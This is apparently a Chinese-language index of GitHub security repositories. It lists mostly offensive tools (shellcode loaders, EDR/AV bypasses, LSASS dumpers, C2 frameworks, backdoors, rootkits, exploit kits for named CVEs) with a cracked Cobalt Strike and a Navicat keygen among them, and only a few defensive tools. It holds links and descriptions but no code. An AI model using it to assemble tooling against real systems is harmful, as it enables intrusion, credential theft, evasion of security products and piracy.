- [cdnCheck_go:快速判断目标解析的IP是否为CDN](https://github.com/damit5/cdnCheck_go)
- [amber:一种新的 PE 壳 - 反射式 PE 壳](https://github.com/EgeBalci/amber)
- [dnsc2:一个基于DNS隧道的简单C2](https://github.com/burpheart/dnsc2)
- [core2ELF64:从内存中 dump 并恢复还原64位可执行ELF 程序](https://github.com/enbarberis/core2ELF64)
- [SharpZip:C#写的 zip 打包工具](https://github.com/uknowsec/SharpZip)
- [AheadLib-x86-x64:DLL 劫持源码生成器](https://github.com/strivexjun/AheadLib-x86-x64)
- [AheadLib64:类似Aheadlib的DLL 劫持源码生成工具](https://github.com/w1nds/AheadLib64)
- [ATPMiniDump:通过PssCaptureSnapShot来 dump lsass 进程](https://github.com/b4rtik/ATPMiniDump)
- [CoffeeLdr:Beacon Object File Loader](https://github.com/Cracked5pider/CoffeeLdr)
- [AniYa:免杀框架](https://github.com/piiperxyz/AniYa)
- [GoBypass:Golang免杀生成工具](https://github.com/afwu/GoBypass)
- [go-shellcode:shellcode 加载器](https://github.com/Ne0nd0g/go-shellcode)
- [AScan:基于python开发的主动漏洞扫描工具](https://github.com/get0shell/AScan)
- [nacs:事件驱动的渗透测试扫描器](https://github.com/u21h2/nacs)
- [goblin:一款适用于红蓝对抗中的仿真钓鱼系统](https://github.com/xiecat/goblin)
- [fridaUiTools:一个界面化整理脚本的工具](https://github.com/dqzg12300/fridaUiTools)
- [wsm:哥斯拉、冰蝎webshell 管理工具](https://github.com/xiecat/wsm)
- [PeView:一款命令行版PE程序结构解析器](https://github.com/lyshark/PeView)
- [CSharp-Tools:CSharp工具集](https://github.com/RcoIl/CSharp-Tools)
- [peekaboo:shellcode 注入和加载器的一些示例](https://github.com/cocomelonc/peekaboo)
- [rasp-vuln:rasp靶场](https://github.com/su18/rasp-vuln)
- [SharpNBTScan:C#编写的NetBIOS扫描工具](https://github.com/BronzeTicket/SharpNBTScan)
- [pe_to_shellcode:将 PE 转换为 shellcode](https://github.com/hasherezade/pe_to_shellcode)
- [WeblogicEnvironment:weblogic 环境搭建工具](https://github.com/QAX-A-Team/WeblogicEnvironment)
- [Karlin:一款支持17种OA、19种CMS的批量漏洞检测利用工具](https://github.com/W01fh4cker/Karlin)
- [cdntest:CDN外部访问与回源可用性状态批量检测](https://github.com/BlueSkyXN/cdntest)
- [WebshellBypass:冰蝎 哥斯拉 WebShell bypass](https://github.com/h0nayuzu/WebshellBypass)
- [shc_bypass:内存加载shellcode绕过waf](https://github.com/passer-W/shc_bypass)
- [shovel:Docker容器逃逸工具](https://github.com/SPuerBRead/shovel)
- [FireEyeGoldCrystal:GitHub监控和信息收集工具](https://github.com/NHPT/FireEyeGoldCrystal)
- [FOFA_GUI:FOFA GUI工具,支持存活检测,icon_hash转换,备份扫描](https://github.com/Summer177/FOFA_GUI)
- [Invoke-PSImage:PowerShell 脚本编码存进 PNG 图片中,并生成执行命令](https://github.com/peewpw/Invoke-PSImage)
- [Python2-Reverse-Shell-Backdoor:使用 Python2的 socket 制作的反向后门](https://github.com/Drpanoukl4/Python2-Reverse-Shell-Backdoor)
- [https2http:把https的代理变成http的代理](https://github.com/LubyRuffy/https2http)
- [pxplan:lv sec收集归纳的POC](https://github.com/GREENHAT7/pxplan)
- [NiCOFF:Nim编写的加载器,可在内存中解析和执行BOF/COFF 文件](https://github.com/frkngksl/NiCOFF)
- [scLoader:CS shellcode 加载器](https://github.com/Peithon/scLoader)
- [NC:navicat激活+注册机等全流程分析](https://github.com/yzctzl/NC)
- [NimicStack:NimicStack 是调用堆栈欺骗技术的纯 Nim 实现,用于模仿合法程序](https://github.com/frkngksl/NimicStack)
- [cola_dnslog:Cola Dnslog v1.3.1 更加强大的dnslog平台/无回显漏洞探测辅助平台](https://github.com/AbelChe/cola_dnslog)
- [whichAlive:批量多线程探测url存活,获取基本信息(标题、ip、长度、跳转、server等)](https://github.com/AbelChe/whichAlive)
- [reverseShellList:快速生成反弹shell payload](https://github.com/AbelChe/reverseShellList)
- [SpringWebflux-MemShell:SpringWebflux通用内存马](https://github.com/mieeA/SpringWebflux-MemShell)
- [RDPHijack-BOF:适用于 CS使用的通过WinStationConnect API 来劫持 RDP会话](https://github.com/netero1010/RDPHijack-BOF)
- [tomcat-weak-password-scanner:tomcat后台弱口令扫描器](https://github.com/magicming200/tomcat-weak-password-scanner)
- [cobaltstrike4.5_cdf:CS4.5破解版](https://github.com/lovechoudoufu/cobaltstrike4.5_cdf)
- [EquationExploit:JAVA 版本永恒之蓝双脉冲星漏洞利用工具](https://github.com/1135/EquationExploit)
- [nps-auth-bypass:nps认证绕过利用工具](https://github.com/carr0t2/nps-auth-bypass)
- [GoBypassAV:整理了基于Go的16种API免杀测试、8种加密测试、反沙盒测试、编译混淆、加壳、资源修改等免杀技术,并搜集汇总了一些资料和工具](https://github.com/TideSec/GoBypassAV)
- [rustfuzz:rust 编写的基本 web fuzz 工具](https://github.com/d4rckh/rustfuzz)
- [geacon:修改自geacon的多功能linux运维管理工具](https://github.com/TheKingOfDuck/geacon)
- [Direct-NtCreateUserProcess](https://github.com/D0pam1ne705/Direct-NtCreateUserProcess)
- [SuperRDP:修复某些版本Windows 不支持 RDP ](https://github.com/anhkgg/SuperRDP)
- [InjectDllTool:多功能DLL注入工具:远程线程注入、消息钩子注入、输入法注入、APC注入、EIP注入、注册表注入](https://github.com/MountCloud/InjectDllTool)
- [Cobalt_Strike_Bot:CobaltStrike上线通知,飞书群聊机器人、server酱通知](https://github.com/r1is/Cobalt_Strike_Bot)
- [Cobalt-Strike:常用 CS 脚本](https://github.com/Mikasazero/Cobalt-Strike)
- [SharpBypassUAC](https://github.com/FatRodzianko/SharpBypassUAC)
- [htpwdScan:HTTP暴力破解、撞库测试工具](https://github.com/lijiejie/htpwdScan)
- [SQLiDetector:Python 编写的用于检查 SQL 回显注入漏洞的工具](https://github.com/eslam3kl/SQLiDetector)
- [Logsensor:用于发现登录面板和 POST 表单的 SQLi ](https://github.com/Mr-Robert0/Logsensor)
- [rfas:让FRP以Windows服务运行](https://github.com/pphuahua/rfas)
- [goby-poc:439个goby poc,可能会有重复自行判断,来源于网络收集的Goby&POC,实时更新](https://github.com/MY0723/goby-poc)
- [PrivilegeHelper:cs维权插件](https://github.com/fdbao/PrivilegeHelper)
- [winlog:一款基于go的windows信息收集工具,主要收集目标机器rdp端口、mstsc远程连接记录、mstsc密码和安全事件中4624、4625登录事件记录](https://github.com/i11us0ry/winlog)
- [ASP.NET-Memshell-Scanner:asp.net内存马检测工具](https://github.com/yzddmr6/ASP.NET-Memshell-Scanner)
- [beanshooter:JMX 枚举和攻击工具](https://github.com/qtc-de/beanshooter)
- [BerylEnigma:一个为渗透测试与CTF而制作的工具集,主要实现一些加解密的功能](https://github.com/ffffffff0x/BerylEnigma)
- [lazfinder:快速遍历目标目录中所有指定后缀文件中包含的敏感信息](https://github.com/thekingofsex/lazfinder)
- [SnowShadow:集成了IP查询,端口扫描,系统命令,Webshell,C段存活扫描,后台目录扫描,远程控制等功能](https://github.com/jinsezlb/SnowShadow)
- [sshpam:记录ssh或sudo明文密码](https://github.com/yaunsky/sshpam)
- [iftree:图形化展示容器网络结构](https://github.com/t1anz0ng/iftree)
- [xnLinkFinder:尽可能多的发现指定目标的相关 URL 和参数](https://github.com/xnl-h4ck3r/xnLinkFinder)
- [macos-all:Mac 上实用的有关渗透测试命令技巧](https://github.com/AbelChe/macos-all)
- [DruidCrack:Druid 密文解密工具](https://github.com/rabbitmask/DruidCrack)
- [xiaxiang-killer:提权神器,低权限强k安全软件](https://github.com/keyixiaxiang/xiaxiang-killer)
- [JSBypassAV:适用于 CS 下生成 jsbypass](https://github.com/kyxiaxiang/JSBypassAV)
- [msmap:内存webshell 生成工具](https://github.com/hosch3n/msmap)
- [ProxyVulns:ProxyLogon CVE-2021-26855 & CVE-2021-27065 利用工具](https://github.com/hosch3n/ProxyVulns)
- [rproxy:自动化的代理服务器](https://github.com/LubyRuffy/rproxy)
- [TamperingSyscalls:绕过 EDR 的系统调用达到免杀](https://github.com/rad9800/TamperingSyscalls)
- [ReturnGate:绕过 EDR 获取 sysid 来达到免杀](https://github.com/timwhitez/ReturnGate)
- [goproxy:Go HTTP(S)代理库, 支持中间人代理解密HTTPS](https://github.com/ouqiang/goproxy)
- [Armor:浏览器反蜜罐插件](https://github.com/jayus0821/Armor)
- [Forest:基于frp(0.44.0)二次开发,删除不必要功能,加密配置文件,修改流量以及文件特征](https://github.com/seventeenman/Forest)
- [grm:redis web端管理工具](https://github.com/gphper/grm)
- [default-http-login-hunter:超过380种设备的默认凭据扫描](https://github.com/InfosecMatter/default-http-login-hunter)
- [sn1per:综合漏扫平台](https://github.com/h4ck3rsguide/sn1per)
- [JmpUnhook:通用方式构造中转函数进行脱钩](https://github.com/timwhitez/JmpUnhook)
- [AceLdr:Cobalt Strike UDRL 用于内存扫描bypass](https://github.com/kyleavery/AceLdr)
- [pyhttpx:基于socket开发的一个网络测试库,供研究https/tls参考](https://github.com/zero3301/pyhttpx)
- [PocOrExp_in_Github:聚合Github上已有的Poc或者Exp](https://github.com/ycdxsb/PocOrExp_in_Github)
- [j2osWin:通过动态链接库绕过反病毒软件Hook - Break JVM](https://github.com/Rvn0xsy/j2osWin)
- [CSMB_PTH:基于SMB协议进行windows主机远程命令执行的工具 使用纯C进行SMB协议包的构造,实现哈希传递,类似Impacket的实现方式。无回显](https://github.com/D0Gshuang/CSMB_PTH)
- [reconftw:reconFTW 是一种工具,旨在通过运行最好的工具集来执行扫描和查找漏洞,对目标域执行自动侦察](https://github.com/six2dez/reconftw)
- [Amass:深入的攻击面映射和资产发现](https://github.com/OWASP/Amass)
- [axiom:集合诸如nmap、ffuf、masscan、nuclei、meg等众多开源安全测试工具的集合框架](https://github.com/pry0cc/axiom)
- [OneListForAll:针对单一目标生成完整的 fuzz 字典](https://github.com/six2dez/OneListForAll)
- [tsh:一个开源的 UNIX 后门](https://github.com/creaktive/tsh)
- [tshtun:Py写的tsh的流量加解密过程](https://github.com/Ridter/tshtun)
- [Burp2Malleable:burp 的 HTTP 请求转换为 Cobalt Strike Malleable C2 profiles](https://github.com/CodeXTF2/Burp2Malleable)
- [minbeacon:为Cobalt Strike构建最小http(s)beacon](https://github.com/th3k3ymak3r/minbeacon)
- [FakeTLS:模拟 TLS 1.3 以伪装 C2 活动的客户端/服务器代码](https://github.com/raykaryshyn/FakeTLS)
- [cs-token-vault:此CS BOF 文件为窃取来/重复的Windows访问令牌创建内存存储](https://github.com/Henkru/cs-token-vault)
- [cs-get-last-error:适用于 CS 的Windows 错误代码查询cna 脚本](https://github.com/Henkru/cs-get-last-error)
- [SchtaskCreator:远程创建任务计划工具](https://github.com/Rvn0xsy/SchtaskCreator)
- [cornershot:判断主机之间是否可访问以及对应端口状态,类似netspy](https://github.com/zeronetworks/cornershot)
- [HijackLibs:跟踪公开披露的DLL劫持](https://github.com/wietze/HijackLibs)
- [SubDomainizer:一个查找子域和隐藏在页面、文件夹和Github等Javascript文件中的有趣内容的工具](https://github.com/nsonaniya2010/SubDomainizer)
- [zgrab2:zmap官方开发的zmap 升级版](https://github.com/zmap/zgrab2)
- [Registry-Recon:绕过 EDR/AV等防护设备进行信息搜集的 CS 插件](https://github.com/optiv/Registry-Recon)
- [RPC-Backdoor:模拟 RPC 后门](https://github.com/eladshamir/RPC-Backdoor)
- [go-memorydll:内存 dll 的 go 包装器](https://github.com/nkbai/go-memorydll)
- [SQLJam:一个探索数据库查询新方法的 jam 项目](https://github.com/bvisness/SQLJam)
- [Webpackfind:类似Packer-Fuzzer的Webpack自动化信息收集工具](https://github.com/xz-zone/Webpackfind)
- [estk:查询和备份各种 Elasticsearch 和 Kibana 版本的数据工具](https://github.com/LeakIX/estk)
- [webcgi-exploits:多语言 Web CGI 接口漏洞利用](https://github.com/wofeiwo/webcgi-exploits)
- [TripleCross:A Linux eBPF rootkit with a backdoor](https://github.com/h3xduck/TripleCross)
- [mscan:一款域渗透扫描工具,方便一键自动化、全方位的信息收集及扫描域提权漏洞](https://github.com/lele8/mscan)
- [hoaxshell:一款功能强大的非传统Windows反向Shell](https://github.com/t3l3machus/hoaxshell)
- [autodeauth:用于自动解除本地网络身份验证的工具](https://github.com/Drew-Alleman/autodeauth)
- [EntropyFix:减少payload 的熵](https://github.com/ORCx41/EntropyFix)
- [cs2modrewrite:将 Cobalt Strike 配置文件转换为 modrewrite 脚本](https://github.com/threatexpress/cs2modrewrite)
- [EasyPen:Python + wxPython编写、提供简洁图形界面、支持跨平台的安全扫描工具,可用于企业内外网巡检、应急响应](https://github.com/lijiejie/EasyPen)
- [CodeReviewTools:通过正则搜索、批量反编译特定Jar包中的class名称](https://github.com/Ppsoft1991/CodeReviewTools)
- [ysoserial:1nhann修改和增加诸多新的反序列化攻击链](https://github.com/1nhann/ysoserial)
- [SharpHostInfo:一款快速探测内网主机信息工具](https://github.com/shmilylty/SharpHostInfo)
- [Adinfo:域信息收集工具(用 golang 二开goddi)](https://github.com/lzzbb/Adinfo)
- [scanPort:golang版高性能端口扫描工具](https://github.com/xs25cn/scanPort)
- [TomcatWeakScan:Tomcat弱口令批量扫描器](https://github.com/Tas9er/TomcatWeakScan)
- [fastjson_payload](https://github.com/kezibei/fastjson_payload)
- [FastjsonScan:Fastjson扫描器,可识别版本、依赖库、autoType状态等](https://github.com/a1phaboy/FastjsonScan)
- [Bof2PIC:BOF/COFF obj file to PIC(shellcode)](https://github.com/timwhitez/Bof2PIC)
- [js-vuln-db:带有 PoC 的 JavaScript 引擎 CVE 集合](https://github.com/tunz/js-vuln-db)
- [AsmShellcodeLoader:汇编语言编写Shellcode加载器源代码](https://github.com/Rvn0xsy/AsmShellcodeLoader)
- [ShellCode_Loader:Msf&CobaltStrike免杀ShellCode加载器](https://github.com/Axx8/ShellCode_Loader)
- [log4j_detect:类似于所谓的rasp的通过java native agent检测log4j的漏洞利用检测工具](https://github.com/huoji120/log4j_detect)
- [srdi-rs:Rusty Shellcode 反射 DLL 注入](https://github.com/memN0ps/srdi-rs)
- [KnownDllUnhook:将当前加载的模块的 .txt 部分从 \KnownDlls\ 替换来绕过 edr](https://github.com/ORCx41/KnownDllUnhook)
- [Invoke-PrintDemon:利用打印机漏洞通过 PowerShell 脚本将任意文件编码成base64后解码写入任意目录,比如system 目录](https://github.com/wh0Nsq/Invoke-PrintDemon)
- [VcenterKiller:一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005,提供一键上传webshell,命令执行或者上传公钥使用SSH连接](https://github.com/Schira4396/VcenterKiller)
- [Freeze:使用多种技术绕过 EDR类产品加载 shellcode](https://github.com/optiv/Freeze)
- [dalfox:一个强大的开源XSS扫描工具和参数分析实用工具](https://github.com/hahwul/dalfox)
- [SharpADUserIP:提取DC日志,快速获取域用户对应IP地址](https://github.com/evilashz/SharpADUserIP)
- [Jenkins-CVE-2017-1000353](https://github.com/r00t4dm/Jenkins-CVE-2017-1000353)
- [SharpEventPersist:通过从事件日志中读写shellcode达到持久化](https://github.com/improsec/SharpEventPersist)
- [ShadowSpray:在这个域中喷洒影子凭证的工具,希望在域中的其他对象上滥用早已被遗忘的GenericWrite/GenericAll DACL](https://github.com/Dec0ne/ShadowSpray)
- [AtomPePacker:多功能PE加壳工具,可用来bypass AV](https://github.com/ORCx41/AtomPePacker)
- [AppInfoScanner:移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具](https://github.com/kelvinBen/AppInfoScanner)
- [CreateUser:绕过360,火绒添加用户](https://github.com/RuanLang0777/CreateUser)
- [geacon_pro:跨平台重构了Cobaltstrike Beacon,适配了大部分Beacon的功能,行为对国内主流杀软免杀](https://github.com/H4de5-7/geacon_pro)
- [SharpUserIP:在域控或远程提取登录日志,快速获取域用户对应的IP地址](https://github.com/lele8/SharpUserIP)
- [FileSearch:C++枚举磁盘列表、遍历指定盘搜索特定类型文件,微信导出密钥Socket/PUT回传,包括反射DLL版本](https://github.com/c1y2m3/FileSearch)
- [FirmAE:物联网设备固件模拟分析](https://github.com/pr0v3rbs/FirmAE)
- [DeimosC2:用golang开发的后渗透测试C2利用框架](https://github.com/DeimosC2/DeimosC2)
- [YongyouNC-Unserialize-Tools:用友NC反序列化漏洞payload生成](https://github.com/Ghost2097221/YongyouNC-Unserialize-Tools)
- [SchTask_0x727:创建隐藏计划任务,权限维持,Bypass AV](https://github.com/0x727/SchTask_0x727)
- [jar-analyzer:一个用于分析`jar`包的GUI工具,尤其适合从事代码安全审计](https://github.com/4ra1n/jar-analyzer)
- [SharpNTLMSSPExtract:利用 NTLMSSP 探测 Windows 信息](https://github.com/RowTeam/SharpNTLMSSPExtract)
- [Gofreeproxy:从fofa获取公开代理,用作动态代理](https://github.com/ja9er/Gofreeproxy)
- [vulnerable-AD:使用powershell脚本创建一个带有域漏洞的域环境](https://github.com/WazeHell/vulnerable-AD)
- [ppmap:go编写的XSS漏洞检测扫描工具](https://github.com/kleiton0x00/ppmap)
- [ShiroKeyCheck:gol编写的Shiro key检测爆破工具](https://github.com/myzxcg/ShiroKeyCheck)
- [ThinkPHPLangVulCheck:一个用于自检Thinkphp多语言漏洞的工具(QVD-2022-46174-ThinkPHP远程代码执行漏洞)](https://github.com/7coinSec/ThinkPHPLangVulCheck)
- [0dayex-checker: Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker)
- [fuzzuli: 一款go编写基于域名生成字典来扫描备份文件的工具](https://github.com/musana/fuzzuli)
- [iisproxy: 通过websocket在IIS8(Windows Server 2012)以上实现socks5代理(在无法反弹socks5,仅有webshell权限时,代理进入内网,类似于reGeorg)](https://github.com/howmp/iisproxy)
- [FilelessPELoader: 在内存中加载远程AES加密过的PE文件并解密运行](https://github.com/TheD1rkMtr/FilelessPELoader)
- [DarkAngel:一款全自动白帽漏洞扫描器,从hackerone、bugcrowd资产监听到漏洞报告生成、企业微信通知](https://github.com/Bywalks/DarkAngel)
- [boopkit:Linux eBPF backdoor over TCP](https://github.com/krisnova/boopkit)
- [EDR-Bypass-demo:Some demos to bypass EDRs or AVs ](https://github.com/7BitsTeam/EDR-Bypass-demo)
- [seeyonExp:致远命令执行漏洞系列的GUI利用工具](https://github.com/kai1025/seeyonExp)
- [vapi:API漏洞练习靶场](https://github.com/roottusk/vapi)
- [APIKiller:API漏洞扫描、检测工具](https://github.com/Aur0ra-m/APIKiller)
- [JNDI-Injection-Exploit-Plus:修改版JNDI注入工具,支持JINDI、反序列化Payload生成、反序列化包装器](https://github.com/cckuailong/JNDI-Injection-Exploit-Plus)
- [phone_dict:一个实用的特殊手机号字典](https://github.com/w2n1ck/phone_dict)
- [IDOR_detect_tool:一款API水平越权漏洞检测工具](https://github.com/y1nglamore/IDOR_detect_tool)
- [URLFinder:类似JSFinder的golang实现,一款用于快速提取检测页面中JS与URL的工具,更快更全更舒服](https://github.com/pingc0y/URLFinder)
- [go_proxy_pool:无环境依赖开箱即用的代理IP池](https://github.com/pingc0y/go_proxy_pool)
- [SmallProxyPool:一个免费高质量的小代理池(从fofa搜索开放socks5代理)](https://github.com/Ggasdfg321/SmallProxyPool)
- [NucleiTP:自动整合全网Nuclei的漏洞POC,实时同步更新最新POC](https://github.com/ExpLangcn/NucleiTP)
- [Amsi-Killer:Lifetime AMSI bypass-终极AMSI bypass](https://github.com/ZeroMemoryEx/Amsi-Killer)
- [ThreadlessInject-BOF:通过BOF实现一种无需创建线程的新型流程注入技术(BOF implementation of @_EthicalChaos_'s ThreadlessInject project. A novel process injection technique with no thread creation, released at BSides Cymru 2023.)](https://github.com/iilegacyyii/ThreadlessInject-BOF)
- [AtomLdr:一个具有高级规避功能的DLL加载器](https://github.com/NUL0x4C/AtomLdr)
- [rsyncvd: 对rsync服务进行弱口令爆破,包括匿名登录检测和登录验证检测](https://github.com/Zoq1An/rsyncvd)
- [HostCollision: 基于golang编写的多线程Host爆破/扫描/碰撞工具](https://github.com/black5ugar/HostCollision)
- [Databasetools: 一款用Go语言编写的数据库自动化提权工具,支持Mysql、MSSQL、Postgresql、Oracle、Redis数据库提权、命令执行、爆破以及ssh连接](https://github.com/Hel10-Web/Databasetools)
- [cube: 内网渗透测试工具,弱密码爆破、信息收集和漏洞扫描](https://github.com/JKme/cube)
- [ldr: BOF/COFF loader in Rust](https://github.com/yamakadi/ldr)
- [rbacr: 针对kubernetes中的RBAC可能被攻击检测工具](https://github.com/ZhuriLab/rbacr)
- [nsproxy: 功能类似tsocks / proxychains-ng / graftcp的命令行代理工具,但只适用于带有net_namespace的Linux系统](https://github.com/nlzy/nsproxy)
- [bashFuck: 针对Linux终端 bashshell 的无字母命令执行payload生成脚本](https://github.com/ProbiusOfficial/bashFuck)
- [apkinfo: 安卓apk信息提取,敏感信息搜集](https://github.com/saucer-man/apkinfo)
- [AndroidToolbox: 软件管理、文件管理、ADB终端以及多设备切换一站式管理Android](https://github.com/saucer-man/AndroidToolbox)
- [frida_example: 常用的frida脚本](https://github.com/saucer-man/frida_example)
- [rabbithole: 一个完全使用Rust编写的代理池工具,从网络搜索socks5代理,检测可用性之后开启socks5代理服务](https://github.com/AbelChe/rabbithole)
- [unveilr: 小程序反编译工具](https://github.com/r3x5ur/unveilr)
- [GoLangUnhooker: EDR绕过,由GoLang编写](https://github.com/nu1r/GoLangUnhooker)
- [vulnerability: 收集、整理、修改互联网上公开的漏洞POC](https://github.com/lal0ne/vulnerability)
- [php_filter_chains_oracle_exploit: A CLI to exploit parameters vulnerable to PHP filter chain error based oracle.](https://github.com/synacktiv/php_filter_chains_oracle_exploit)
- [chatGPT-CodeReview: 调用chatGPT进行代码审计的工具](https://github.com/Kento-Sec/chatGPT-CodeReview)
- [ApacheTomcatScanner: 针对tomcat漏洞扫描脚本](https://github.com/p0dalirius/ApacheTomcatScanner)
- [evil_minio: EXP for CVE-2023-28434 MinIO unauthorized to RCE](https://github.com/AbelChe/evil_minio)
- [Library-POC: 基于Pocsuite3、goby编写的漏洞poc&exp存档](https://github.com/luck-ying/Library-POC)
- [rakshasa: 基于go编写的跨平台、稳定、隐秘的多级代理内网穿透工具](https://github.com/Mob2003/rakshasa)
- [Recaf: Java字节码编辑器](https://github.com/Col-E/Recaf)
- [watchvuln: 一个高价值漏洞采集与推送服务](https://github.com/zema1/watchvuln)
- [Quasar: 经典Windows远控软件](https://github.com/quasar/Quasar)
- [anew: 像文本添加不重复的内容(行)类似于 tee -a 命令](https://github.com/tomnomnom/anew)
- [wmiexec-Pro: 新一代的wmiexec.py](https://github.com/XiaoliChan/wmiexec-Pro)
- [nanodump: LSASS转储的瑞士军刀](https://github.com/fortra/nanodump)
- [GoLangPhant0m: 杀win 日志](https://github.com/nu1r/GoLangPhant0m)
- [feroxbuster: 一个用Rust编写的快速、简单、递归的目录扫描工具](https://github.com/epi052/feroxbuster)
- [yetAnotherObfuscator: 绕过Windows Defender的C#混淆器](https://github.com/0xb11a1/yetAnotherObfuscator)
- [SharpExchangeKing: Exchange 服务器安全性的辅助测试工具](https://github.com/RowTeam/SharpExchangeKing)
- [HardHatC2: 一个C#命令和控制框架](https://github.com/DragoQCC/HardHatC2)
- [Supershell: Supershell C2 远控平台,基于反向SSH隧道获取完全交互式Shell](https://github.com/tdragon6/Supershell)
- [DumpHash: 一款dump hash工具配合后渗透的利用](https://github.com/Avienma/DumpHash)
- [ChangeTimestamp: 一键修改exe、dll的编译时间、创建时间、修改时间和访问时间](https://github.com/sorabug/ChangeTimestamp)
- [RpcsDemo: 利用RPC协议在内网中的一些攻击面{DumpLsass,AddUser,ChangeNtlm,TSCH_DESK,OXIDINterka_network_card,CreateService等}](https://github.com/M0nster3/RpcsDemo)
- [WeblogicTool: WeblogicTool,GUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等](https://github.com/KimJun1010/WeblogicTool)
- [BaRMIe: Java RMI enumeration and attack tool.](https://github.com/NickstaDB/BaRMIe)
- [fpp: fpp (free proxy pool) 基于Golang的开箱即用跨平台的免费代理池,IP代理池,HTTP代理池。 ](https://github.com/HaliComing/fpp)
- [NoMoney: 一款集成了fofa,zoomeye(钟馗之眼),censys,奇安信的鹰图平台,360quake,且完全免费的信息收集工具](https://github.com/H-Limbus/NoMoney)
- [scrying: A tool for collecting RDP, web and VNC screenshots all in one place](https://github.com/nccgroup/scrying)
- [noterce: 一种另辟蹊径的免杀执行系统命令的木马](https://github.com/xiao-zhu-zhu/noterce)
- [SysWhispers3WinHttp: 基于SysWhispers3项目增添WinHttp分离加载功能,可免杀绕过360核晶与Defender](https://github.com/huaigu4ng/SysWhispers3WinHttp)
- [MisConfig_HTTP_Proxy_Scanner: 扫描错误的nginx反代和转发配置,已发现内网资产(类似hosts碰撞)](https://github.com/lijiejie/MisConfig_HTTP_Proxy_Scanner)
- [UserRegEnum_0x727: 域内普通域用户权限查找域内所有计算机上登录的用户](https://github.com/0x727/UserRegEnum_0x727)
- [fuzzuli: 基于域名的关键备份文件扫描工具](https://github.com/musana/fuzzuli)
- [go-public: 基于 Go 的端口转发工具](https://github.com/songquanpeng/go-public)
- [ByPassUACTools: Windows 平台下的UAC(User Account Contro) 绕过工具](https://github.com/Adminisme/ByPassUACTools)
- [JsonExp: fastjson漏洞批量检测工具](https://github.com/smallfox233/JsonExp)
- [Mimikatz: 用c#实现了个远程拉取Mimikatz.ps1](https://github.com/Avienma/Mimikatz)
- [RedisEXP: Redis 漏洞利用工具](https://github.com/yuyan-sec/RedisEXP)
- [JundeadShell: Java内存马注入工具](https://github.com/0x00007c00/JundeadShell)
- [WeaverScan: 泛微oa漏洞利用工具](https://github.com/TD0U/WeaverScan)
- [frpCracker: 一款golang编写的,批量检测frp server未授权访问、弱token的工具](https://github.com/SleepingBag945/frpCracker)
- [exec2shell: 将PE、ELF或Mach-O可执行文件的TEXT部分提取为shellcode](https://github.com/Binject/exec2shell)
- [unauthorized_com: 未授权检测的命令行版,支持批量检测](https://github.com/xk11z/unauthorized_com)
- [HiddenDesktop: 隐藏桌面,适用于Cobalt Strike使用VNC的时候隐藏桌面操作](https://github.com/WKL-Sec/HiddenDesktop)
- [ProxyPoolxSocks: Socks代理池服务端自动化搭建工具](https://github.com/Anyyy111/ProxyPoolxSocks)
- [npsmodify: ps的魔改,进行了流量特征的魔改,并且进行了漏洞的修复](https://github.com/Q16G/npsmodify)
- [BOFRunPortable: BOF内存运行exe](https://github.com/9bie/BOFRunPortable)
- [SSH-Harvester: 从OpenSSH服务器上自动获取密码](https://github.com/jm33-m0/SSH-Harvester)
- [ChYing: 一款安全工具箱,集成了目录扫描、JWT、Swagger 测试、编/解码、轻量级 BurpSuite、杀软辅助功能](https://github.com/yhy0/ChYing)
- [taiE: 一键getshell集成化工具](https://github.com/1f3lse/taiE)
- [gsocket: 穿透防火墙或NAT进行通信](https://github.com/hackerschoice/gsocket)
- [KeymouseGo: 类似按键精灵的鼠标键盘录制和自动化操作 模拟点击和键入](https://github.com/taojy123/KeymouseGo)
- [ghauri: 类似sqlmap的sql注入自动化利用工具](https://github.com/r0oth3x49/ghauri)
- [weiquan: cs维权插件](https://github.com/kasjhkjaSD/weiquan)
- [cloudSec: 云平台AK/SK-WEB利用工具](https://github.com/libaibaia/cloudSec)
- [udpx: UDPX是一个用Go语言编写的单包UDP扫描器,速度快,重量轻,支持发现超过45个服务,并能添加自定义服务](https://github.com/nullt3r/udpx)
- [dnsVerifier: 一款批量验证dns可用性的工具爬网站JS文件,自动fuzz api接口,指定api接口](https://github.com/alwaystest18/dnsVerifier)
- [jjjjjjjjjjjjjs: 爬网站JS文件,自动fuzz api接口,指定api接口](https://github.com/ttstormxx/jjjjjjjjjjjjjs)
- [win-port-proxy: 添加windows端口转发的小工具](https://github.com/veritas501/win-port-proxy)
- [AsteriskPassword: 基于C++&MFC开发的星号密码查看器](https://github.com/gh0stkey/AsteriskPassword)
- [WatchAD2.0: WatchAD2.0是一款针对域威胁的日志分析与监控系统](https://github.com/Qihoo360/WatchAD2.0)
- [SharpDBeaver: DBeaver数据库密码解密工具](https://github.com/lele8/SharpDBeaver)
- [WMIHACKER: 一种绕过反病毒软件的横向移动命令执行工具](https://github.com/rootclay/WMIHACKER)
- [MSSQL-Fileless-Rootkit-WarSQLKit: 一个用于对MSSQL Server进行攻击的工具,它是一个文件型和文件型分离的MSSQL权限提升工具,可以在MSSQL Server中创建一个后门账户,或者将现有账户的权限提升到sysadmin权限](https://github.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit)
- [NacosRce: Nacos JRaft Hessian 反序列化 RCE 加载字节码 注入内存马 不出网利用](https://github.com/c0olw/NacosRce)
- [Vuln_Bulid: 自建漏洞环境库【fastjson、jxc、log4j、ssrf、shiro、ofcms等】](https://github.com/Funsiooo/Vuln_Bulid)
- [chunsou: (春蒐)Python3编写的多线程Web指纹识别工具,适用于安全测试人员前期的资产识别、风险收敛以及企业互联网资产风险摸查](https://github.com/Funsiooo/chunsou)
- [java-gate: 通过简单的 `Java` 代码实现 `Hell's Gate` 相关技术(直接的系统调用)](https://github.com/4ra1n/java-gate)
- [WIKI-POC: 漏洞库【OA以及各种web APP漏洞】](https://github.com/7estUser/WIKI-POC)
- [FineReportExploit: 基于go语言的帆软报表漏洞检测工具](https://github.com/Drac0nids/FineReportExploit)
- [SSRFmap: 自动化SSRF漏洞探测](https://github.com/swisskyrepo/SSRFmap)
- [qq-tim-elevation: 腾讯 QQ/TIM本地提权漏洞](https://github.com/vi3t1/qq-tim-elevation)
- [VolatilityPro: 一款用于自动化处理内存取证的Python脚本,并提供GUI界面](https://github.com/Tokeii0/VolatilityPro)
- [NimExec: 在Nim中执行横向移动的无文件命令](https://github.com/frkngksl/NimExec)
